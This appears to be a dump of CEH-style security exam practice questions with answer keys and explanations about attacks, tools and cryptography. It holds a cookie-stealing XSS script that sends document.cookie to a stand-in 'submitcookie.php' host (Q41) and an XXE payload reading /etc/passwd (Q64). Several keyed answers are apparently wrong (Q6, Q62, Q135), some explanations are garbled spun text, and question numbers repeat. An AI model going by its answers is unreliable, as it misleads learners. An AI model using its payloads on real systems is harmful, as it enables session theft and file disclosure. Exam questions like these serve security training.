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NEW QUESTION 1
- (Exam Topic 3)
Which type of malware spreads from one system to another or from one network to another and causes similar types of damage as viruses do to the infected
system?

A. Rootkit
B. Trojan
C. Worm
D. Adware

Answer: C

NEW QUESTION 2
- (Exam Topic 3)
Which among the following is the best example of the third step (delivery) in the cyber kill chain?

A. An intruder sends a malicious attachment via email to a target.
B. An intruder creates malware to be used as a malicious attachment to an email.
C. An intruder's malware is triggered when a target opens a malicious email attachment.
D. An intruder's malware is installed on a target's machine.

Answer: A

NEW QUESTION 3
- (Exam Topic 3)
Harper, a software engineer, is developing an email application. To ensure the confidentiality of email messages. Harper uses a symmetric-key block cipher having
a classical 12- or 16-round Feistel network with a block size of 64 bits for encryption, which includes large 8 x 32-bit S-boxes (S1, S2, S3, S4) based on bent
functions, modular addition and subtraction, key-dependent rotation, and XOR operations. This cipher also uses a masking key(Km1)and a rotation key (Kr1) for
performing its functions. What is the algorithm employed by Harper to secure the email messages?

A. CAST-128
B. AES
C. GOST block cipher
D. DES

Answer: A

NEW QUESTION 4
- (Exam Topic 3)
Jude, a pen tester working in Keiltech Ltd., performs sophisticated security testing on his company's network infrastructure to identify security loopholes. In this
process, he started to circumvent the network protection tools and firewalls used in the company. He employed a technique that can create forged TCP sessions
by carrying out multiple SYN, ACK, and RST or FIN packets. Further, this process allowed Jude to execute DDoS attacks that can exhaust the network resources.
What is the attack technique used by Jude for finding loopholes in the above scenario?

A. UDP flood attack
B. Ping-of-death attack
C. Spoofed session flood attack
D. Peer-to-peer attack

Answer: C

NEW QUESTION 5
- (Exam Topic 3)
Alex, a cloud security engineer working in Eyecloud Inc. is tasked with isolating applications from the underlying infrastructure and stimulating communication via
well-defined channels. For this purpose, he used an open-source technology that helped him in developing, packaging, and running applications; further, the
technology provides PaaS through OS-level visualization, delivers containerized software packages, and promotes fast software delivery. What is the cloud
technology employed by Alex in the above scenario?

A. Virtual machine
B. Serverless computing
C. Docker
D. Zero trust network

Answer: C

NEW QUESTION 6
- (Exam Topic 3)
Calvin, a grey-hat hacker, targets a web application that has design flaws in its authentication mechanism. He enumerates usernames from the login form of the
web application, which requests users to feed data and specifies the incorrect field in case of invalid credentials. Later, Calvin uses this information to perform
social engineering.
Which of the following design flaws in the authentication mechanism is exploited by Calvin?

A. Insecure transmission of credentials
B. Verbose failure messages
C. User impersonation
D. Password reset mechanism
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Answer: D

NEW QUESTION 7
- (Exam Topic 3)
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden
information about official government or federal databases. After gathering the Information, he successfully performed an attack on the target government
organization without being traced. Which of the following techniques is described in the above scenario?

A. Dark web footprinting
B. VoIP footpnnting
C. VPN footprinting
D. website footprinting

Answer: A

Explanation: 
The deep web is the layer of the online cyberspace that consists of web pages and content that are hidden and unindexed.

NEW QUESTION 8
- (Exam Topic 3)
Which of the following tactics uses malicious code to redirect users' web traffic?

A. Spimming
B. Pharming
C. Phishing
D. Spear-phishing

Answer: B

NEW QUESTION 9
- (Exam Topic 3)
Ben purchased a new smartphone and received some updates on it through the OTA method. He received two messages: one with a PIN from the network
operator and another asking him to enter the PIN received from the operator. As soon as he entered the PIN, the smartphone started functioning in an abnormal
manner. What is the type of attack performed on Ben in the above scenario?

A. Advanced SMS phishing
B. Bypass SSL pinning
C. Phishing
D. Tap 'n ghost attack

Answer: A

NEW QUESTION 10
- (Exam Topic 3)
Sam, a web developer, was instructed to incorporate a hybrid encryption software program into a web application to secure email messages. Sam used an
encryption software, which is a free implementation of the OpenPGP standard that uses both symmetric-key cryptography and asymmetric-key cryptography for
improved speed and secure key exchange. What is the encryption software employed by Sam for securing the email messages?

A. PGP
B. S/MIME
C. SMTP
D. GPG

Answer: A

NEW QUESTION 10
- (Exam Topic 3)
Which of the following allows attackers to draw a map or outline the target organization's network infrastructure to know about the actual environment that they are
going to hack.

A. Enumeration
B. Vulnerability analysis
C. Malware analysis
D. Scanning networks

Answer: D

NEW QUESTION 12
- (Exam Topic 3)
A DDOS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a
partial request, the target servers opens multiple connections and keeps waiting for the requests to complete.
Which attack is being described here?

A. Desynchronization
B. Slowloris attack
C. Session splicing
D. Phlashing
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Answer: B

Explanation: 
Developed by Robert “RSnake” Hansen, Slowloris is DDoS attack software that permits one computer to require down an internet server. Due the straightforward
yet elegant nature of this attack, it requires minimal bandwidth to implement and affects the target server’s web server only, with almost no side effects on other
services and ports.Slowloris has proven highly-effective against many popular sorts of web server software, including Apache 1.x and 2.x.Over the years, Slowloris
has been credited with variety of high-profile server takedowns. Notably, it had been used extensively by Iranian ‘hackivists’ following the 2009 Iranian
presidential election to attack Iranian government internet sites .Slowloris works by opening multiple connections to the targeted web server and keeping them
open as long as possible. It does this by continuously sending partial HTTP requests, none of which are ever completed. The attacked servers open more and
connections open, expecting each of the attack requests to be completed.Periodically, the Slowloris sends subsequent HTTP headers for every request, but never
actually completes the request. Ultimately, the targeted server’s maximum concurrent connection pool is filled, and extra (legitimate) connection attempts are
denied.By sending partial, as against malformed, packets, Slowloris can easily elapse traditional Intrusion Detection systems.Named after a kind of slow-moving
Asian primate, Slowloris really does win the race by moving slowly and steadily. A Slowloris attack must await sockets to be released by legitimate requests before
consuming them one by one.For a high-volume internet site , this will take a while . the method are often further slowed if legitimate sessions are reinitiated. But
within the end, if the attack is unmitigated, Slowloris—like the tortoise—wins the race.If undetected or unmitigated, Slowloris attacks also can last for long periods of
your time . When attacked sockets outing , Slowloris simply reinitiates the connections, continuing to reach the online server until mitigated.Designed for stealth
also as efficacy, Slowloris are often modified to send different host headers within the event that a virtual host is targeted, and logs are stored separately for every
virtual host.More importantly, within the course of an attack, Slowloris are often set to suppress log file creation. this suggests the attack can catch unmonitored
servers off-guard, with none red flags appearing in log file entries.Methods of mitigationImperva’s security services are enabled by reverse proxy technology, used
for inspection of all incoming requests on their thanks to the clients’ servers.Imperva’s secured proxy won’t forward any partial connection requests—rendering all
Slowloris DDoS attack attempts completely and utterly useless.

NEW QUESTION 14
- (Exam Topic 3)
Cross-site request forgery involves:

A. A request sent by a malicious user from a browser to a server
B. Modification of a request by a proxy between client and server
C. A browser making a request to a server without the user’s knowledge
D. A server making a request to another server without the user’s knowledge

Answer: C

Explanation: 
https://owasp.org/www-community/attacks/csrf
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently
authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing
actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring
funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
CSRF is an attack that tricks the victim into submitting a malicious request. It inherits the identity and privileges of the victim to perform an undesired function on
the victim’s behalf. For most sites, browser requests automatically include any credentials associated with the site, such as the user’s session cookie, IP address,
Windows domain credentials, and so forth. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish between the forged
request sent by the victim and a legitimate request sent by the victim.
CSRF attacks target functionality that causes a state change on the server, such as changing the victim’s email address or password, or purchasing something.
Forcing the victim to retrieve data doesn’t benefit an attacker because the attacker doesn’t receive the response, the victim does. As such, CSRF attacks target
state-changing requests.
It’s sometimes possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called “stored CSRF flaws”. This can be accomplished by
simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the
site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than
some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.

NEW QUESTION 18
- (Exam Topic 3)
Samuel, a professional hacker, monitored and Intercepted already established traffic between Bob and a host machine to predict Bob's ISN. Using this ISN,
Samuel sent spoofed packets with Bob's IP address to the host machine. The host machine responded with <| packet having an Incremented ISN. Consequently.
Bob's connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is the type of attack performed by Samuel in the
above scenario?

A. UDP hijacking
B. Blind hijacking
C. TCP/IP hacking
D. Forbidden attack

Answer: C

Explanation: 
A TCP/IP hijack is an attack that spoofs a server into thinking it’s talking with a sound client, once actually it’s communication with an assaulter that has
condemned (or hijacked) the tcp session. Assume that the client has administrator-level privileges, which the attacker needs to steal that authority so as to form a
brand new account with root-level access of the server to be used afterward. A tcp Hijacking is sort of a two-phased man-in-the-middle attack. The man-in-the-
middle assaulter lurks within the circuit between a shopper and a server so as to work out what port and sequence numbers are being employed for the
conversation.
First, the attacker knocks out the client with an attack, like Ping of Death, or ties it up with some reasonably ICMP storm. This renders the client unable to transmit
any packets to the server. Then, with the client crashed, the attacker assumes the client’s identity so as to talk with the server. By this suggests, the attacker gains
administrator-level access to the server.
One of the most effective means of preventing a hijack attack is to want a secret, that’s a shared secret
between the shopper and also the server. looking on the strength of security desired, the key may be used for random exchanges. this is often once a client and
server periodically challenge each other, or it will occur with each exchange, like Kerberos.

NEW QUESTION 22
- (Exam Topic 3)
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Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web server to identify any possible weaknesses,
vulnerabilities, and misconfigurations. In this process, Jack uses an automated tool that eases his work and performs vulnerability scanning to find hosts, services,
and other vulnerabilities in the target server. Which of the following tools is used by Jack to perform vulnerability scanning?

A. Infoga
B. WebCopier Pro
C. Netsparker
D. NCollector Studio

Answer: C

NEW QUESTION 26
- (Exam Topic 3)
Which protocol is used for setting up secure channels between two devices, typically in VPNs?

A. PEM
B. ppp
C. IPSEC
D. SET

Answer: C

NEW QUESTION 29
- (Exam Topic 3)
Henry is a penetration tester who works for XYZ organization. While performing enumeration on a client organization, he queries the DNS server for a specific
cached DNS record. Further, by using this cached record, he determines the sites recently visited by the organization's user. What is the enumeration technique
used by Henry on the organization?

A. DNS zone walking
B. DNS cache snooping
C. DNS SEC zone walking
D. DNS cache poisoning

Answer: B

NEW QUESTION 33
- (Exam Topic 3)
Which of the following Metasploit post-exploitation modules can be used to escalate privileges on Windows systems?

A. getsystem
B. getuid
C. keylogrecorder
D. autoroute

Answer: A

NEW QUESTION 35
- (Exam Topic 3)
What type of virus is most likely to remain undetected by antivirus software?

A. Cavity virus
B. Stealth virus
C. File-extension virus
D. Macro virus

Answer: B

NEW QUESTION 38
- (Exam Topic 3)
Which of the following is a passive wireless packet analyzer that works on Linux-based systems?

A. Burp Suite
B. OpenVAS
C. tshark
D. Kismet

Answer: C

NEW QUESTION 41
- (Exam Topic 3)
Judy created a forum, one day. she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who
discovers that the following code is hidden behind those images:
<script>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</script>
What issue occurred for the users who clicked on the image?
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A. The code inject a new cookie to the browser.
B. The code redirects the user to another site.
C. The code is a virus that is attempting to gather the users username and password.
D. This php file silently executes the code and grabs the users session cookie and session ID.

Answer: D

Explanation: 
document.write(<img.src=https://localhost/submitcookie.php cookie =+ escape(document.cookie) +/>); (Cookie and session ID theft)
https://www.softwaretestinghelp.com/cross-site-scripting-xss-attack-test/
As seen in the indicated question, cookies are escaped and sent to script to variable ‘cookie’. If the malicious user would inject this script into the website’s code,
then it will be executed in the user’s browser and cookies will be sent to the malicious user.

NEW QUESTION 46
- (Exam Topic 3)
Jane is working as a security professional at CyberSol Inc. She was tasked with ensuring the authentication and integrity of messages being transmitted in the
corporate network. To encrypt the messages, she implemented a security model in which every user in the network maintains a ring of public keys. In this model, a
user needs to encrypt a message using the receiver's public key, and only the receiver can decrypt the message using their private key. What is the security model
implemented by Jane to secure corporate messages?

A. Zero trust network
B. Transport Layer Security (TLS)
C. Secure Socket Layer (SSL)
D. Web of trust (WOT)

Answer: D

NEW QUESTION 51
- (Exam Topic 3)
Which tool can be used to silently copy files from USB devices?

A. USB Grabber
B. USB Snoopy
C. USB Sniffer
D. Use Dumper

Answer: D

NEW QUESTION 52
- (Exam Topic 3)
CyberTech Inc. recently experienced SQL injection attacks on its official website. The company appointed Bob, a security professional, to build and incorporate
defensive strategies against such attacks. Bob adopted a practice whereby only a list of entities such as the data type, range, size, and value, which have been
approved for secured access, is accepted. What is the defensive technique employed by Bob in the above scenario?

A. Output encoding
B. Enforce least privileges
C. Whitelist validation
D. Blacklist validation

Answer: C

NEW QUESTION 54
- (Exam Topic 3)
If executives are found liable for not properly protecting their company’s assets and information systems, what type of law would apply in this situation?

A. Criminal
B. International
C. Common
D. Civil

Answer: D

NEW QUESTION 59
- (Exam Topic 3)
Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her activities several times and sent a
fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and
logged in to that page using her valid credentials. Which of the following tools is employed by Clark to create the spoofed email?

A. PyLoris
B. Slowloris
C. Evilginx
D. PLCinject

Answer: C

NEW QUESTION 62
- (Exam Topic 3)
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Which Nmap switch helps evade IDS or firewalls?

A. -n/-R
B. -0N/-0X/-0G
C. -T
D. -D

Answer: C

NEW QUESTION 64
- (Exam Topic 3)
Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following input?
<!DOCTYPE blah [ < IENTITY trustme SYSTEM "file:///etc/passwd" > ] >

A. XXE
B. SQLi
C. IDOR
D. XXS

Answer: A

NEW QUESTION 69
- (Exam Topic 3)
You are tasked to configure the DHCP server to lease the last 100 usable IP addresses in subnet to. 1.4.0/23. Which of the following IP addresses could be teased
as a result of the new configuration?

A. 210.1.55.200
B. 10.1.4.254
C. 10.1.5.200
D. 10.1.4.156

Answer: C

Explanation: 
https://en.wikipedia.org/wiki/Subnetwork
As we can see, we have an IP address of 10.1.4.0 with a subnet mask of /23. According to the question, we need to determine which IP address will be included in
the range of the last 100 IP addresses.
The available addresses for hosts start with 10.1.4.1 and end with 10.1.5.254. Now you can clearly see that the last 100 addresses include the address 10.1.5.200.

NEW QUESTION 70
- (Exam Topic 3)
What would you enter if you wanted to perform a stealth scan using Nmap?

A. nmap -sM
B. nmap -sU
C. nmap -sS
D. nmap -sT

Answer: C

NEW QUESTION 72
- (Exam Topic 3)
Attacker Simon targeted the communication network of an organization and disabled the security controls of NetNTLMvl by modifying the values of
LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. He then extracted all the non-network logon tokens from all the active processes to
masquerade as a legitimate user to launch further attacks. What is the type of attack performed by Simon?

A. Internal monologue attack
B. Combinator attack
C. Rainbow table attack
D. Dictionary attack

Answer: A

NEW QUESTION 74
- (Exam Topic 3)
A group of hackers were roaming around a bank office building in a city, driving a luxury car. They were using hacking tools on their laptop with the intention to find
a free-access wireless network. What is this hacking process known as?

A. GPS mapping
B. Spectrum analysis
C. Wardriving
D. Wireless sniffing

Answer: C

NEW QUESTION 77
- (Exam Topic 3)
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What would be the purpose of running "wget 192.168.0.15 -q -S" against a web server?

A. Performing content enumeration on the web server to discover hidden folders
B. Using wget to perform banner grabbing on the webserver
C. Flooding the web server with requests to perform a DoS attack
D. Downloading all the contents of the web page locally for further examination

Answer: B

Explanation: 
-q, --quiet quiet (no output)
-S, --server-response print server response

NEW QUESTION 81
- (Exam Topic 3)
Gregory, a professional penetration tester working at Sys Security Ltd., is tasked with performing a security test of web applications used in the company. For this
purpose, Gregory uses a tool to test for any security loopholes by hijacking a session between a client and server. This tool has a feature of intercepting proxy that
can be used to inspect and modify the traffic between the browser and target application. This tool can also perform customized attacks and can be used to test
the randomness of session tokens. Which of the following tools is used by Gregory in the above scenario?

A. Nmap
B. Burp Suite
C. CxSAST
D. Wireshark

Answer: B

NEW QUESTION 84
- (Exam Topic 3)
When conducting a penetration test, it is crucial to use all means to get all available information about the target network. One of the ways to do that is by sniffing
the network. Which of the following cannot be
performed by the passive network sniffing?

A. Identifying operating systems, services, protocols and devices
B. Modifying and replaying captured network traffic
C. Collecting unencrypted information about usernames and passwords
D. Capturing a network traffic for further analysis

Answer: B

NEW QUESTION 87
- (Exam Topic 3)
An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to
the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization
deckled to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the
following tools must the organization employ to protect its critical infrastructure?

A. Robotium
B. BalenaCloud
C. Flowmon
D. IntentFuzzer

Answer: C

Explanation: 
Source: https://www.flowmon.com
Flowmon empowers manufacturers and utility companies to ensure the reliability of their industrial networks confidently to avoid downtime and disruption of service
continuity. This can be achieved by continuous monitoring and anomaly detection so that malfunctioning devices or security incidents, such as cyber espionage,
zero-days, or malware, can be reported and remedied as quickly as possible.

NEW QUESTION 90
- (Exam Topic 3)
Which of the following is considered an exploit framework and has the ability to perform automated attacks on services, ports, applications and unpatched security
flaws in a computer system?

A. Wireshark
B. Maltego
C. Metasploit
D. Nessus

Answer: C

Explanation: 
https://en.wikipedia.org/wiki/Metasploit_Project
The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature
development. It is owned by Boston, Massachusetts-based security company Rapid7.
Its best-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other
important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project includes anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Metasploit is pre-installed in the Kali Linux
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operating system.
The basic steps for exploiting a system using the Framework include.
* 1. Optionally checking whether the intended target system is vulnerable to an exploit.
* 2. Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows,
Unix/Linux and macOS systems are included).
* 3. Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server).
Metasploit often recommends a payload that should work.
* 4. Choosing the encoding technique so that hexadecimal opcodes known as "bad characters" are removed from the payload, these characters will cause the
exploit to fail.
* 5. Executing the exploit.
This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers,
exploit writers and payload writers.

NEW QUESTION 91
- (Exam Topic 3)
Mary found a high vulnerability during a vulnerability scan and notified her server team. After analysis, they sent her proof that a fix to that issue had already been
applied. The vulnerability that Marry found is called what?

A. False-negative
B. False-positive
C. Brute force attack
D. Backdoor

Answer: B

Explanation: 
https://www.infocyte.com/blog/2019/02/16/cybersecurity-101-what-you-need-to-know-about-false-positives-an
False positives are mislabeled security alerts, indicating there is a threat when in actuality, there isn’t. These false/non-malicious alerts (SIEM events) increase
noise for already over-worked security teams and can include software bugs, poorly written software, or unrecognized network traffic.
False negatives are uncaught cyber threats — overlooked by security tooling because they’re dormant, highly sophisticated (i.e. file-less or capable of lateral
movement) or the security infrastructure in place lacks the technological ability to detect these attacks.

NEW QUESTION 96
- (Exam Topic 3)
Morris, an attacker, wanted to check whether the target AP is in a locked state. He attempted using different utilities to identify WPS-enabled APs in the target
wireless network. Ultimately, he succeeded with one special command-line utility. Which of the following command-line utilities allowed Morris to discover the
WPS-enabled APs?

A. wash
B. ntptrace
C. macof
D. net View

Answer: A

NEW QUESTION 98
- (Exam Topic 3)
Bill has been hired as a penetration tester and cyber security auditor for a major credit card company. Which information security standard is most applicable to his
role?

A. FISMA
B. HITECH
C. PCI-DSS
D. Sarbanes-OxleyAct

Answer: C

NEW QUESTION 102
- (Exam Topic 3)
Which of the following provides a security professional with most information about the system’s security posture?

A. Phishing, spamming, sending trojans
B. Social engineering, company site browsing tailgating
C. Wardriving, warchalking, social engineering
D. Port scanning, banner grabbing service identification

Answer: D

NEW QUESTION 104
- (Exam Topic 3)
Ron, a security professional, was pen testing web applications and SaaS platforms used by his company. While testing, he found a vulnerability that allows
hackers to gain unauthorized access to API objects and perform actions such as view, update, and delete sensitive data of the company. What is the API
vulnerability revealed in the above scenario?

A. Code injections
B. Improper use of CORS
C. No ABAC validation
D. Business logic flaws
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Answer: B

NEW QUESTION 108
- (Exam Topic 3)
A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the current time from the target host machine.
Which of the following Zenmap options must the analyst use to perform the ICMP timestamp ping scan?

A. -PY
B. -PU
C. -PP
D. -Pn

Answer: C

NEW QUESTION 110
- (Exam Topic 3)
Which iOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after each successive reboot?

A. Tethered jailbreaking
B. Semi-tethered jailbreaking
C. Untethered jailbreaking
D. Semi-Untethered jailbreaking

Answer: C

Explanation: 
An untethered jailbreak is one that allows a telephone to finish a boot cycle when being pwned with none interruption to jailbreak-oriented practicality.
Untethered jailbreaks area unit the foremost sought-after of all, however they’re additionally the foremost difficult to attain due to the powerful exploits and organic
process talent they need. associate unbound jailbreak is sent over a physical USB cable association to a laptop or directly on the device itself by approach of
associate application-based exploit, like a web site in campaign.
Upon running associate unbound jailbreak, you’ll be able to flip your pwned telephone off and on once more while not running the jailbreak tool once more. all of
your jailbreak tweaks and apps would then continue in operation with none user intervention necessary.
It’s been an extended time since IOS has gotten the unbound jailbreak treatment. the foremost recent example was the computer-based Pangu break, that
supported most handsets that ran IOS nine.1. We’ve additionally witnessed associate unbound jailbreak within the kind of JailbreakMe, that allowed users to pwn
their handsets directly from the mobile campaign applications programme while not a laptop.

NEW QUESTION 112
- (Exam Topic 2)
Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the targets MSP provider by sending spear-phishing emails and distributed
custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her
MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization.
Which of the following cloud attacks did Alice perform in the above scenario?

A. Cloud hopper attack
B. Cloud cryptojacking
C. Cloudborne attack
D. Man-in-the-cloud (MITC) attack

Answer: A

Explanation: 
Operation Cloud Hopper was an in depth attack and theft of data in 2017 directed at MSP within the uk (U.K.), us (U.S.), Japan, Canada, Brazil, France,
Switzerland, Norway, Finland, Sweden, South Africa , India,
Thailand, South Korea and Australia. The group used MSP as intermediaries to accumulate assets and trade secrets from MSP client engineering, MSP industrial
manufacturing, retail, energy, pharmaceuticals, telecommunications, and government agencies.Operation Cloud Hopper used over 70 variants of backdoors,
malware and trojans. These were delivered through spear-phishing emails. The attacks scheduled tasks or leveraged services/utilities to continue Microsoft
Windows systems albeit the pc system was rebooted. It installed malware and hacking tools to access systems and steal data.

NEW QUESTION 115
- (Exam Topic 2)
Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web server. To thwart evolving attacks, he decided to
harden the security of the web server by adopting a countermeasures to secure the accounts on the web server.
Which of the following countermeasures must Larry implement to secure the user accounts on the web server?

A. Enable unused default user accounts created during the installation of an OS
B. Enable all non-interactive accounts that should exist but do not require interactive login
C. Limit the administrator or toot-level access to the minimum number of users
D. Retain all unused modules and application extensions

Answer: C

NEW QUESTION 118
- (Exam Topic 2)
Bella, a security professional working at an it firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames.
and passwords are shared In plaintext, paving the way for hackers 10 perform successful session hijacking. To address this situation. Bella Implemented a
protocol that sends data using encryption and digital certificates. Which of the following protocols Is used by Bella?

A. FTP
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B. HTTPS
C. FTPS
D. IP

Answer: C

Explanation: 
The File Transfer Protocol (FTP) is a standard organization convention utilized for the exchange of PC records from a worker to a customer on a PC organization.
FTP is based on a customer worker model engineering utilizing separate control and information associations between the customer and the server.[1] FTP clients
may validate themselves with an unmistakable book sign-in convention, ordinarily as a username and secret key, however can interface namelessly if the worker is
designed to permit it. For secure transmission that ensures the username and secret phrase, and scrambles the substance, FTP is frequently made sure about
with SSL/TLS (FTPS) or supplanted with SSH File Transfer Protocol (SFTP).
The primary FTP customer applications were order line programs created prior to working frameworks had graphical UIs, are as yet dispatched with most
Windows, Unix, and Linux working systems.[2][3] Many FTP customers and mechanization utilities have since been created for working areas, workers, cell
phones, and equipment, and FTP has been fused into profitability applications, for example, HTML editors.

NEW QUESTION 123
- (Exam Topic 2)
Henry Is a cyber security specialist hired by BlackEye - Cyber security solutions. He was tasked with discovering the operating system (OS) of a host. He used the
Unkornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which Indicates that the target system is running a Windows OS.
Identify the TTL value Henry obtained, which indicates that the target OS is Windows.

A. 64
B. 128
C. 255
D. 138

Answer: B

Explanation: 
Windows TTL 128, Linux TTL 64, OpenBSD 255 ... https://subinsb.com/default-device-ttl-values/ Time to Live (TTL) represents to number of 'hops' a packet can
take before it is considered invalid. For
Windows/Windows Phone, this value is 128. This value is 64 for Linux/Android.

NEW QUESTION 124
- (Exam Topic 2)
Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market.
To launch the attacks process, he performed DNS footprinting to gather information about ONS servers and to identify the hosts connected in the target network.
He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names. IP addresses. DNS records, and
network Who is records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?

A. Knative
B. zANTI
C. Towelroot
D. Bluto

Answer: D

Explanation: 
https://www.darknet.org.uk/2017/07/bluto-dns-recon-zone-transfer-brute-forcer/
"Attackers also use DNS lookup tools such as DNSdumpster.com, Bluto, and Domain Dossier to retrieve DNS records for a specified domain or hostname. These
tools retrieve information such as domains and IP addresses, domain Whois records, DNS records, and network Whois records." CEH Module 02 Page 138

NEW QUESTION 127
- (Exam Topic 2)
This TCP flag instructs the sending system to transmit all buffered data immediately.

A. SYN
B. RST
C. PSH
D. URG
E. FIN

Answer: C

NEW QUESTION 131
- (Exam Topic 2)
Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he
uses a tool to track the emails of the target and
extracts information such as sender identities, mall servers, sender IP addresses, and sender locations from different public sources. He also checks if an email
address was leaked using the haveibeenpwned.com API. Which of the following tools is used by Wilson in the above scenario?

A. Factiva
B. Netcraft
C. infoga
D. Zoominfo

Answer: C
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Explanation: 
Infoga may be a tool gathering email accounts informations (ip,hostname,country,…) from completely different public supply (search engines, pgp key servers and
shodan) and check if email was leaked using haveibeenpwned.com API. is a really simple tool, however very effective for the first stages of a penetration test or
just to know the visibility of your company within the net.

NEW QUESTION 132
- (Exam Topic 2)
Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target
network.
Which of the following host discovery techniques must he use to perform the given task?

A. UDP scan
B. TCP Maimon scan
C. arp ping scan
D. ACK flag probe scan

Answer: C

Explanation: 
One of the most common Nmap usage scenarios is scanning an Ethernet LAN. Most LANs, especially those that use the private address range granted by RFC
1918, do not always use the overwhelming majority of IP addresses. When Nmap attempts to send a raw IP packet, such as an ICMP echo request, the OS must
determine a destination hardware (ARP) address, such as the target IP, so that the Ethernet frame can be properly addressed. .. This is required to issue a series
of ARP requests. This is best illustrated by an example where a ping scan is attempted against an Area Ethernet host. The –send-ip option tells Nmap to send IP-
level packets (rather than raw Ethernet), even on area networks. The Wireshark output of the three ARP requests and their timing have been pasted into the
session.
Raw IP ping scan example for offline targetsThis example took quite a couple of seconds to finish because the (Linux) OS sent three ARP requests at 1 second
intervals before abandoning the host. Waiting for a few seconds is excessive, as long as the ARP response usually arrives within a few milliseconds. Reducing this
timeout period is not a priority for OS vendors, as the overwhelming majority of packets are sent to the host that actually exists. Nmap, on the other hand, needs to
send packets to 16 million IP s given a target like 10.0.0.0/8. Many targets are pinged in parallel, but waiting 2 seconds each is very delayed.
There is another problem with raw IP ping scans on the LAN. If the destination host turns out to be unresponsive, as in the previous example, the source host
usually adds an incomplete entry for that destination IP to the kernel ARP table. ARP tablespaces are finite and some operating systems become unresponsive
when full. If Nmap is used in rawIP mode (–send-ip), Nmap may have to wait a few minutes for the ARP cache entry to expire before continuing host discovery.
ARP scans solve both problems by giving Nmap the highest priority. Nmap issues raw ARP requests and handles retransmissions and timeout periods in its sole
discretion. The system ARP cache is bypassed. The example shows the difference. This ARP scan takes just over a tenth of the time it takes for an equivalent IP.
Example b ARP ping scan of offline target

In example b, neither the -PR option nor the -send-eth option has any effect. This is often because ARP has a default scan type on the Area Ethernet network
when scanning Ethernet hosts that Nmap discovers. This includes traditional wired Ethernet as 802.11 wireless networks. As mentioned above, ARP scanning is
not only more efficient, but also more accurate. Hosts frequently block IP-based ping packets, but usually cannot block ARP requests or responses and
communicate over the network.Nmap uses ARP instead of all targets on equivalent targets, even if different ping types (such as -PE and -PS) are specified. LAN..
If you do not need to attempt an ARP scan at all, specify –send-ip as shown in Example a “Raw IP Ping Scan for Offline Targets”.
If you give Nmap control to send raw Ethernet frames, Nmap can also adjust the source MAC address. If you have the only PowerBook in your security conference
room and a large ARP scan is initiated from an
Apple-registered MAC address, your head may turn to you. Use the –spoof-mac option to spoof the MAC
address as described in the MAC Address Spoofing section.

NEW QUESTION 135
- (Exam Topic 2)
ViruXine.W32 virus hides their presence by changing the underlying executable code.
This Virus code mutates while keeping the original algorithm intact, the code changes itself each time it runs, but the function of the code (its semantics) will not
change at all.

Here is a section of the Virus code:
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What is this technique called?

A. Polymorphic Virus
B. Metamorphic Virus
C. Dravidic Virus
D. Stealth Virus

Answer: A

NEW QUESTION 137
- (Exam Topic 2)
John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using
PGP. What should John do to communicate correctly using this type of encryption?

A. Use his own public key to encrypt the message.
B. Use Marie's public key to encrypt the message.
C. Use his own private key to encrypt the message.
D. Use Marie's private key to encrypt the message.

Answer: B

Explanation: 
When a user encrypts plaintext with PGP, PGP first compresses the plaintext. The session key works with a very secure, fast conventional encryption algorithm to
encrypt the plaintext; the result is ciphertext. Once the data is encrypted, the session key is then encrypted to the recipient's public key
https://en.wikipedia.org/wiki/Pretty_Good_Privacy
